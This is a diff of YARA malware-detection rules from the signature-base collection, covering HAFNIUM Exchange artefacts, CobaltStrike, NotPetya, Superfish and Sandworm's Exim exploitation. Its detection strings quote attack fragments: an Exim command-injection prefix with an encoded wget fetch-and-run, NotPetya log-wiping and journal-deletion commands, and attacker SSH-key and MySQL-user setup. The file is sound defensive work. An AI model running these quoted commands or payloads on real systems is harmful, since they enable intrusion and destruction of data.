+		$s241 = { F1 F0 F1 F0 F1 F3 ?? ?? F1 F3 F1 F0 F1 F3 ?? ?? F1 F2 F1 F3 F1 F5 ?? ?? ?? ?? F1 F5 F1 F3 F1 F5 ?? ?? ?? ?? F1 F4 F1 F0 F1 F3 ?? ?? }
+		$s242 = { F2 F3 F2 F3 F2 F0 ?? ?? F2 F0 F2 F3 F2 F0 ?? ?? F2 F1 F2 F0 F2 F6 ?? ?? ?? ?? F2 F6 F2 F0 F2 F6 ?? ?? ?? ?? F2 F7 F2 F3 F2 F0 ?? ?? }
+		$s243 = { F3 F2 F3 F2 F3 F1 ?? ?? F3 F1 F3 F2 F3 F1 ?? ?? F3 F0 F3 F1 F3 F7 ?? ?? ?? ?? F3 F7 F3 F1 F3 F7 ?? ?? ?? ?? F3 F6 F3 F2 F3 F1 ?? ?? }
+		$s244 = { F4 F5 F4 F5 F4 F6 ?? ?? F4 F6 F4 F5 F4 F6 ?? ?? F4 F7 F4 F6 F4 F0 ?? ?? ?? ?? F4 F0 F4 F6 F4 F0 ?? ?? ?? ?? F4 F1 F4 F5 F4 F6 ?? ?? }
+		$s245 = { F5 F4 F5 F4 F5 F7 ?? ?? F5 F7 F5 F4 F5 F7 ?? ?? F5 F6 F5 F7 F5 F1 ?? ?? ?? ?? F5 F1 F5 F7 F5 F1 ?? ?? ?? ?? F5 F0 F5 F4 F5 F7 ?? ?? }
+		$s246 = { F6 F7 F6 F7 F6 F4 ?? ?? F6 F4 F6 F7 F6 F4 ?? ?? F6 F5 F6 F4 F6 F2 ?? ?? ?? ?? F6 F2 F6 F4 F6 F2 ?? ?? ?? ?? F6 F3 F6 F7 F6 F4 ?? ?? }
+		$s247 = { F7 F6 F7 F6 F7 F5 ?? ?? F7 F5 F7 F6 F7 F5 ?? ?? F7 F4 F7 F5 F7 F3 ?? ?? ?? ?? F7 F3 F7 F5 F7 F3 ?? ?? ?? ?? F7 F2 F7 F6 F7 F5 ?? ?? }
+		$s248 = { F8 F9 F8 F9 F8 FA ?? ?? F8 FA F8 F9 F8 FA ?? ?? F8 FB F8 FA F8 FC ?? ?? ?? ?? F8 FC F8 FA F8 FC ?? ?? ?? ?? F8 FD F8 F9 F8 FA ?? ?? }
+		$s249 = { F9 F8 F9 F8 F9 FB ?? ?? F9 FB F9 F8 F9 FB ?? ?? F9 FA F9 FB F9 FD ?? ?? ?? ?? F9 FD F9 FB F9 FD ?? ?? ?? ?? F9 FC F9 F8 F9 FB ?? ?? }
+		$s250 = { FA FB FA FB FA F8 ?? ?? FA F8 FA FB FA F8 ?? ?? FA F9 FA F8 FA FE ?? ?? ?? ?? FA FE FA F8 FA FE ?? ?? ?? ?? FA FF FA FB FA F8 ?? ?? }
+		$s251 = { FB FA FB FA FB F9 ?? ?? FB F9 FB FA FB F9 ?? ?? FB F8 FB F9 FB FF ?? ?? ?? ?? FB FF FB F9 FB FF ?? ?? ?? ?? FB FE FB FA FB F9 ?? ?? }
+		$s252 = { FC FD FC FD FC FE ?? ?? FC FE FC FD FC FE ?? ?? FC FF FC FE FC F8 ?? ?? ?? ?? FC F8 FC FE FC F8 ?? ?? ?? ?? FC F9 FC FD FC FE ?? ?? }
+		$s253 = { FD FC FD FC FD FF ?? ?? FD FF FD FC FD FF ?? ?? FD FE FD FF FD F9 ?? ?? ?? ?? FD F9 FD FF FD F9 ?? ?? ?? ?? FD F8 FD FC FD FF ?? ?? }
+		$s254 = { FE FF FE FF FE FC ?? ?? FE FC FE FF FE FC ?? ?? FE FD FE FC FE FA ?? ?? ?? ?? FE FA FE FC FE FA ?? ?? ?? ?? FE FB FE FF FE FC ?? ?? }
+		$s255 = { FF FE FF FE FF FD ?? ?? FF FD FF FE FF FD ?? ?? FF FC FF FD FF FB ?? ?? ?? ?? FF FB FF FD FF FB ?? ?? ?? ?? FF FA FF FE FF FD ?? ?? }
+		$fp1 = "ICSharpCode.Decompiler" wide
 
 	condition:
-		all of ( $hex* ) and ( ( $docx at 0 ) or ( $pdf at 0 ) )
+		any of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_EXPL_LOG_CVE_2021_27065_Exchange_Forensic_Artefacts_Mar21_1 : LOG CVE_2021_27065
+rule SIGNATURE_BASE_Cobaltstrike_MZ_Launcher
 {
 	meta:
-		description = "Detects forensic artefacts found in HAFNIUM intrusions exploiting CVE-2021-27065"
-		author = "Florian Roth (Nextron Systems)"
-		id = "dcc1f741-cab0-5a0b-a261-a6bd05989723"
-		date = "2021-03-02"
+		description = "Detects CobaltStrike MZ header ReflectiveLoader launcher"
+		author = "yara@s3c.za.net"
+		id = "461a4741-11c5-53d9-b8e1-52d64cfe755b"
+		date = "2021-07-08"
 		modified = "2023-12-05"
-		reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium_log_sigs.yar#L2-L13"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cobaltstrike_evasive.yar#L297-L307"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9306cf177928266ea921461e9da80ad5bb37e1e0848559898a414956cfbc2b49"
+		logic_hash = "aa188546db138dffdcdbf6538367b5d5bc37638a2784b24b7fcd913c15e56072"
 		score = 75
 		quality = 85
-		tags = "LOG, CVE-2021-27065"
-
-	strings:
-		$s1 = "S:CMD=Set-OabVirtualDirectory.ExternalUrl='" ascii wide fullword
-
-	condition:
-		1 of them
-}
-rule SIGNATURE_BASE_EXPL_LOG_CVE_2021_26858_Exchange_Forensic_Artefacts_Mar21_1 : LOG CVE_2021_26858
-{
-	meta:
-		description = "Detects forensic artefacts found in HAFNIUM intrusions exploiting CVE-2021-26858"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f6fa90c7-c2c0-56db-bf7b-dc146761a995"
-		date = "2021-03-02"
-		modified = "2021-03-04"
-		reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium_log_sigs.yar#L15-L28"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0a8296b7e990e52330412288e9ff71e08a5258fc63c4754e6d0e6d64302f55e6"
-		score = 65
-		quality = 60
-		tags = "LOG, CVE-2021-26858"
+		tags = ""
 
 	strings:
-		$xr1 = /POST (\/owa\/auth\/Current\/themes\/resources\/logon\.css|\/owa\/auth\/Current\/themes\/resources\/owafont_ja\.css|\/owa\/auth\/Current\/themes\/resources\/lgnbotl\.gif|\/owa\/auth\/Current\/themes\/resources\/owafont_ko\.css|\/owa\/auth\/Current\/themes\/resources\/SegoeUI-SemiBold\.eot|\/owa\/auth\/Current\/themes\/resources\/SegoeUI-SemiLight\.ttf|\/owa\/auth\/Current\/themes\/resources\/lgnbotl\.gif)/
+		$mz_launcher = { 4D 5A 41 52 55 48 89 E5 48 81 EC 20 00 00 00 48 8D 1D }
 
 	condition:
-		$xr1
+		$mz_launcher
 }
-rule SIGNATURE_BASE_LOG_Exchange_Forensic_Artefacts_Cleanup_Activity_Mar21_1 : LOG
+rule SIGNATURE_BASE_Cobaltstrike_Unmodifed_Beacon
 {
 	meta:
-		description = "Detects forensic artefacts showing cleanup activity found in HAFNIUM intrusions exploiting"
-		author = "Florian Roth (Nextron Systems)"
-		id = "95b19544-147b-5496-b717-669cbc488179"
-		date = "2021-03-08"
+		description = "Detects unmodified CobaltStrike beacon DLL"
+		author = "yara@s3c.za.net"
+		id = "8eeb03f9-9698-5a46-b45b-224d5c3f3df7"
+		date = "2019-08-16"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/jdferrell3/status/1368626281970024448"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium_log_sigs.yar#L48-L65"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cobaltstrike_evasive.yar#L309-L320"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "12e5b76dafcae13f1eb21913ae0bde233152fd8b9d29f073893418ac9f742de3"
-		score = 70
+		logic_hash = "10114a431fb70be8e18e67b22aa76bf2c0536f07d373f717c1dc51755e0847c9"
+		score = 75
 		quality = 85
-		tags = "LOG"
-
-	strings:
-		$x1 = "cmd.exe /c cd /d C:/inetpub/wwwroot/aspnet_client" ascii wide
-		$x2 = "cmd.exe /c cd /d C:\\inetpub\\wwwroot\\aspnet_client" ascii wide
-		$s1 = "aspnet_client&del '"
-		$s2 = "aspnet_client&attrib +h +s +r "
-		$s3 = "&echo [S]"
-
-	condition:
-		1 of ( $x* ) or 2 of them
-}
-rule SIGNATURE_BASE_EXPL_LOG_CVE_2021_27055_Exchange_Forensic_Artefacts : LOG
-{
-	meta:
-		description = "Detects suspicious log entries that indicate requests as described in reports on HAFNIUM activity"
-		author = "Zach Stanford - @svch0st, Florian Roth"
-		id = "8b0110a9-fd03-5f7d-bdd8-03ff48bcac68"
-		date = "2021-03-10"
-		modified = "2021-03-15"
-		reference = "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium_log_sigs.yar#L67-L90"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "131ff0ce189dfeace0922000b0d15dfb5a1270bee8fba8e4d66aa75b1d3f864f"
-		score = 65
-		quality = 60
-		tags = "LOG"
+		tags = ""
 
 	strings:
-		$x1 = "ServerInfo~" ascii wide
-		$sr1 = /\/ecp\/[0-9a-zA-Z]{1,3}\.js/ ascii wide
-		$s1 = "/ecp/auth/w.js" ascii wide
-		$s2 = "/owa/auth/w.js" ascii wide
-		$s3 = "/owa/auth/x.js" ascii wide
-		$s4 = "/ecp/main.css" ascii wide
-		$s5 = "/ecp/default.flt" ascii wide
-		$s6 = "/owa/auth/Current/themes/resources/logon.css" ascii wide
+		$loader_export = "ReflectiveLoader"
+		$exportname = "beacon.dll"
 
 	condition:
-		$x1 and 1 of ( $s* )
+		all of them
 }
-rule SIGNATURE_BASE_LOG_CVE_2021_27065_Exchange_Forensic_Artefacts_Mar21_2 : LOG
+rule SIGNATURE_BASE_Notpetya_Ransomware_Jun17 : FILE
 {
 	meta:
-		description = "Detects suspicious log entries that indicate requests as described in reports on HAFNIUM activity"
+		description = "Detects new NotPetya Ransomware variant from June 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "37a26def-b360-518e-a4ab-9604a5b39afd"
-		date = "2021-03-10"
+		id = "8805f971-0680-534d-9955-65dc4ecc934a"
+		date = "2017-06-27"
 		modified = "2023-12-05"
-		reference = "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium_log_sigs.yar#L92-L104"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "13e2e46689bc0e87c3cf13dc2ce213c384afe6c03c21e62a467974a0518c12da"
-		score = 65
-		quality = 85
-		tags = "LOG"
-
-	strings:
-		$sr1 = /GET \/rpc\/ &CorrelationID=<empty>;&RequestId=[^\n]{40,600} (200|301|302)/
-
-	condition:
-		$sr1
-}
-rule SIGNATURE_BASE_MAL_ELF_Xlogin_Nov24_1 : FILE
-{
-	meta:
-		description = "Detects xlogin backdoor samples"
-		author = "Florian Roth"
-		id = "e8940660-ecf8-5616-9cb1-fc0a02d35689"
-		date = "2024-11-11"
-		modified = "2024-12-12"
-		reference = "https://blog.sekoia.io/solving-the-7777-botnet-enigma-a-cybersecurity-quest/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_xlogin_nov24.yar#L2-L24"
+		reference = "https://goo.gl/h6iaGj"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_nopetya_jun17.yar#L12-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "42fe8a32022592ff976d6d2839d949e28f60c8958f64a20c1c3c9091fb64d31e"
-		score = 80
+		logic_hash = "e49fd918e9cc09a60434e62767794cd908f195cb71fd7a752a2b4802973bc92e"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "2b09a6811a9d0447f8c6480430eb0f7e3ff64fa933d0b2e8cd6117f38382cc6a"
-		hash2 = "d1cbf80786b1ca1ba2e5c31ec09159be276ad3d10fc0a8a0dbff229d8263ca0a"
-		hash3 = "ff17e9bcc1ed16985713405b95745e47674ec98e3c6c889df797600718a35b2c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745"
+		hash2 = "45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0"
+		hash3 = "64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1"
 
 	strings:
-		$xc1 = { 6C 6F 67 69 6E 3A 00 25 73 00 00 2F 62 69 6E 2F 73 68 00 2F 74 6D 70 2F 6C 6F 67 69 6E }
-		$s1 = "/tmp/login" ascii fullword
-		$s2 = "npxXoudifFeEgGaACSnmcs[" ascii fullword
-		$sc1 = { 28 6E 69 6C 29 00 00 00 28 6E 75 6C 6C 29 }
+		$x1 = "Ooops, your important files are encrypted." fullword wide ascii
+		$x2 = "process call create \"C:\\Windows\\System32\\rundll32.exe \\\"C:\\Windows\\%s\\\" #1 " fullword wide
+		$x3 = "-d C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\%s\",#1 " fullword wide
+		$x4 = "Send your Bitcoin wallet ID and personal installation key to e-mail " fullword wide
+		$x5 = "fsutil usn deletejournal /D %c:" fullword wide
+		$x6 = "wevtutil cl Setup & wevtutil cl System" ascii
+		$x7 = { 2C 00 23 00 31 00 20 00 00 00 00 00 00 00 00 00 72 00 75 00 6E
+         00 64 00 6C 00 6C 00 33 00 32 00 2E 00 65 00 78 00 65 00 }
+		$s1 = "%s /node:\"%ws\" /user:\"%ws\" /password:\"%ws\" " fullword wide
+		$s4 = "\\\\.\\pipe\\%ws" fullword wide
+		$s5 = "schtasks %ws/Create /SC once /TN \"\" /TR \"%ws\" /ST %02d:%02d" fullword wide
+		$s6 = "u%s \\\\%s -accepteula -s " fullword wide
+		$s7 = "dllhost.dat" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 500KB and ( 1 of ( $x* ) or 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_OSX_Backdoor_Bella : FILE
+rule SIGNATURE_BASE_Visualdiscovery_Lonovo_Superfish_SSL_Hijack : FILE
 {
 	meta:
-		description = "Bella MacOS/OSX backdoor"
-		author = "John Lambert @JohnLaTwC"
-		id = "d2a994f9-acff-5de4-8f70-453b5d4d7947"
-		date = "2018-02-23"
+		description = "Lenovo Superfish SSL Interceptor - file VisualDiscovery.exe"
+		author = "Florian Roth (Nextron Systems) / improved by kbandla"
+		id = "200c016e-7ad8-5b58-be5f-7866e91d60e9"
+		date = "2015-02-19"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/JohnLaTwC/status/911998777182924801"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_osx_backdoor_bella.yar#L2-L42"
+		reference = "https://twitter.com/4nc4p/status/568325493558272000"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/threat_lenovo_superfish.yar#L4-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4288a81779a492b5b02bad6e90b2fa6212fa5f8ee87cc5ec9286ab523fc02446 cec7be2126d388707907b4f9d681121fd1e3ca9f828c029b02340ab1331a5524 e1cf136be50c4486ae8f5e408af80b90229f3027511b4beed69495a042af95be"
-		logic_hash = "c2fa72072decd850698fbaaa9c2a6687cdf64e6bac068ff52a97963053db4339"
+		logic_hash = "0f156a51dccafe32467b64251507928b1c7a1b04595063aa66aa69da6c4cc4fc"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "99af9cfc7ab47f847103b5497b746407dc566963"
+		hash2 = "f0b0cd0227ba302ac9ab4f30d837422c7ae66c46"
+		hash3 = "f12edf2598d8f0732009c5cd1df5d2c559455a0b"
+		hash4 = "343af97d47582c8150d63cbced601113b14fcca6"
 
 	strings:
-		$h1 = "#!/usr/bin/env"
-		$s0 = "subprocess" fullword ascii
-		$s1 = "import sys" fullword ascii
-		$s2 = "shutil" fullword ascii
-		$p0 = "create_bella_helpers" fullword ascii
-		$p1 = "is_there_SUID_shell" fullword ascii
-		$p2 = "BELLA IS NOW RUNNING" fullword ascii
-		$p3 = "SELECT * FROM bella WHERE id" fullword ascii
-		$subpart1_a = "inject_payloads" fullword ascii
-		$subpart1_b = "check_if_payloads" fullword ascii
-		$subpart1_c = "updateDB" fullword ascii
-		$subpart2_a = "appleIDPhishHelp" fullword ascii
-		$subpart2_b = "appleIDPhish" fullword ascii
-		$subpart2_c = "iTunes" fullword ascii
+		$s2 = "Invalid key length used to initialize BlowFish." fullword ascii
+		$s3 = "GetPCProxyHandler" fullword ascii
+		$s4 = "StartPCProxy" fullword ascii
+		$s5 = "SetPCProxyHandler" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x752f2123 and $h1 at 0 and filesize < 120KB and @s0 [ 1 ] < 100 and @s1 [ 1 ] < 100 and @s2 [ 1 ] < 100 and 1 of ( $p* ) or all of ( $subpart1_* ) or all of ( $subpart2_* )
+		uint16( 0 ) == 0x5a4d and filesize < 2MB and all of ( $s* )
 }
-rule SIGNATURE_BASE_SUSP_VHD_Suspicious_Small_Size : FILE
+rule SIGNATURE_BASE_APT_Sandworm_Keywords_May20_1 : CVE_2019_10149 FILE
 {
 	meta:
-		description = "Detects suspicious VHD files"
+		description = "Detects commands used by Sandworm group to exploit critical vulernability CVE-2019-10149 in Exim"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f4a72e7b-ddd3-5038-9440-1e81dc27755d"
-		date = "2019-12-21"
-		modified = "2023-01-27"
-		reference = "https://twitter.com/MeltX0R/status/1208095892877774850"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_vhd_anomaly.yar#L2-L28"
+		id = "e0d4e90e-5547-5487-8d0c-a141d88fff7c"
+		date = "2020-05-28"
+		modified = "2023-12-05"
+		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_exim_expl.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0bd5b113714854feaa89d52d4bab6a4a00f0dcb7fd816fa7b036eb43d3ea0dd8"
-		score = 50
-		quality = 83
-		tags = "FILE"
-		hash1 = "3382a75bd959d2194c4b1a8885df93e8770f4ebaeaff441a5180ceadf1656cd9"
+		logic_hash = "9f9a81ff0c576f05ac063eaca7a5882dbdb09c9a0778610cca2864636a00efce"
+		score = 75
+		quality = 85
+		tags = "CVE-2019-10149, FILE"
 
 	strings:
-		$hc1 = { 63 6F 6E 65 63 74 69 78 }
-		$hc2a = { 49 6E 76 61 6C 69 64 20 70 61 72 74 69 74 69 6F
-               6E 20 74 61 62 6C 65 00 45 72 72 6F 72 20 6C 6F
-               61 64 69 6E 67 20 6F 70 65 72 61 74 69 6E 67 20
-               73 79 73 74 65 6D 00 4D 69 73 73 69 6E 67 20 6F
-               70 65 72 61 74 69 6E 67 20 73 79 73 74 65 6D }
-		$hc2b = "connectix"
+		$x1 = "MAIL FROM:<$(run("
+		$x2 = "exec\\x20\\x2Fusr\\x2Fbin\\x2Fwget\\x20\\x2DO\\x20\\x2D\\x20http"
 
 	condition:
-		not uint16( 0 ) == 0x5a4d and filesize > 1KB and filesize <= 4000KB and ( $hc1 at 0 or all of ( $hc2* ) )
+		filesize < 8000KB and 1 of them
 }
-rule SIGNATURE_BASE_PUP_Installrex_Antifwb : FILE
+rule SIGNATURE_BASE_APT_Sandworm_SSH_Key_May20_1 : FILE
 {
 	meta:
-		description = "Malware InstallRex / AntiFW"
+		description = "Detects SSH key used by Sandworm on exploited machines"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b327527e-8b88-5292-933b-102bd76df4eb"
-		date = "2015-05-13"
+		id = "ea2968b8-7ae4-56b8-9547-816c5e37c50a"
+		date = "2020-05-28"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_antifw_installrex.yar#L2-L19"
+		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_exim_expl.yar#L17-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "bb5607cd2ee51f039f60e32cf7edc4e21a2d95cd"
-		logic_hash = "04f25497ee9a9af20179b81679d993315d6bb3d7bf7d8e9cbb01374395019610"
-		score = 55
+		logic_hash = "23a43849dfaa80bad2ca4f46b53181b3a4855ee89673ae9b658c854069b9aaa9"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
+		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
 
 	strings:
-		$s4 = "Error %u while loading TSU.DLL %ls" fullword ascii
-		$s7 = "GetModuleFileName() failed => %u" fullword ascii
-		$s8 = "TSULoader.exe" fullword wide
-		$s15 = "\\StringFileInfo\\%04x%04x\\Arguments" wide
-		$s17 = "Tsu%08lX.dll" fullword wide
+		$x1 = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2q/NGN/brzNfJiIp2zswtL33tr74pIAjMeWtXN1p5Hqp5fTp058U1EN4NmgmjX0KzNjjV"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		filesize < 1000KB and 1 of them
 }
-
-rule SIGNATURE_BASE_Monsoon_APT_Malware_1 : FILE
+rule SIGNATURE_BASE_APT_Sandworm_SSHD_Config_Modification_May20_1 : FILE
 {
 	meta:
-		description = "Detects malware from Monsoon APT"
+		description = "Detects ssh config entry inserted by Sandworm on compromised machines"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a543c46d-01fc-5276-a915-183263956455"
-		date = "2017-09-08"
-		modified = "2023-01-06"
-		reference = "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_monsoon.yar#L14-L35"
+		id = "dd60eeb7-3d4b-5a6a-8054-50c617ee8c73"
+		date = "2020-05-28"
+		modified = "2023-12-05"
+		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_exim_expl.yar#L33-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "76580f999d445f4baace5287a3038e294f8be3783289d6c7c5b2c0c92c39db86"
+		logic_hash = "5775588b3a9d44e9eb2c8ef0f50351d7e3b06f1005f669775fae7187900d5999"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "c9642f44d33e4c990066ce6fa0b0956ff5ace6534b64160004df31b9b690c9cd"
+		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
+		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
 
 	strings:
-		$s1 = "cmd.exe /c start " fullword ascii
-		$s2 = "\\Microsoft\\Templates\\" ascii
-		$s3 = "\\Microsoft\\Windows\\" ascii
+		$x1 = "AllowUsers mysql_db" ascii
+		$a1 = "ListenAddress" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "a0c824244f1d36ea1dd2759cf7599cd1" or all of them ) )
+		filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_Monsoon_APT_Malware_2 : FILE
+rule SIGNATURE_BASE_APT_Sandworm_Initfile_May20_1 : FILE
 {
 	meta:
-		description = "Detects malware from Monsoon APT"
+		description = "Detects mysql init script used by Sandworm on compromised machines"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dbbccf56-7e36-5c3a-b8d9-ee08d077f29f"
-		date = "2017-09-08"
+		id = "0bd613e3-6bd4-5cec-bc0d-2bdb83caf142"
+		date = "2020-05-28"
 		modified = "2023-12-05"
-		reference = "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_monsoon.yar#L37-L64"
+		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_exim_expl.yar#L51-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "20552573102dd981c81ffa6a8c7bbdfafc9bbb7da1fbc12f273bca7d6a0c9d05"
+		logic_hash = "989f37069820d9ecf67dc71e4761a7cde2c1adf8db40b5f8a47e9c610ddec2e6"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "17c3d0fe08e1184c9737144fa065f4530def30d6591e5414a36463609f9aa53a"
-		hash2 = "8e0574ebf3dc640ac82987ab6ee2a02fc3dd5eaf4f6b5275272ba887acd15ac0"
-		hash3 = "bf93ca5f497fc7f38533d37fd4c083523ececc34aa2d3660d81014c0d9091ae3"
+		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
+		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
 
 	strings:
-		$x1 = "\\Microsoft\\Windows\\coco.exe" ascii
-		$x2 = ":\\System Volume Information\\config" fullword ascii
-		$x3 = " cscript.[BACKSPA[PAGE DO[CAPS LO[PAGE UPTPX498.dTPX499.d" fullword wide
-		$s1 = "\\Microsoft\\Templates\\msvcrt.dll" ascii
-		$s2 = "%04d/%02d/%02d %02d:%02d:%02d - {%s}" fullword wide
-		$s3 = "wininet.dll    " fullword ascii
-		$s4 = "DMCZ0001.dat" fullword ascii
-		$s5 = "TZ0000001.dat" fullword ascii
-		$s6 = "\\MUT.dat" ascii
-		$s7 = "ouemm/emm!!!!!!!!!!!!!" fullword ascii
+		$s1 = "GRANT ALL PRIVILEGES ON * . * TO 'mysqldb'@'localhost';" ascii
+		$s2 = "CREATE USER 'mysqldb'@'localhost' IDENTIFIED BY '" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 3 of them ) )
+		filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_ELF_LNX_UPX_Compressed_File : FILE
+rule SIGNATURE_BASE_APT_Sandworm_User_May20_1 : FILE
 {
 	meta:
-		description = "Detects a suspicious ELF binary with UPX compression"
+		description = "Detects user added by Sandworm on compromised machines"
 		author = "Florian Roth (Nextron Systems)"
-		id = "078937de-59b3-538e-a5c3-57f4e6050212"
-		date = "2018-12-12"
+		id = "ada549a4-abcc-5c0a-9601-75631e78c835"
+		date = "2020-05-28"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_elf_file_anomalies.yar#L2-L21"
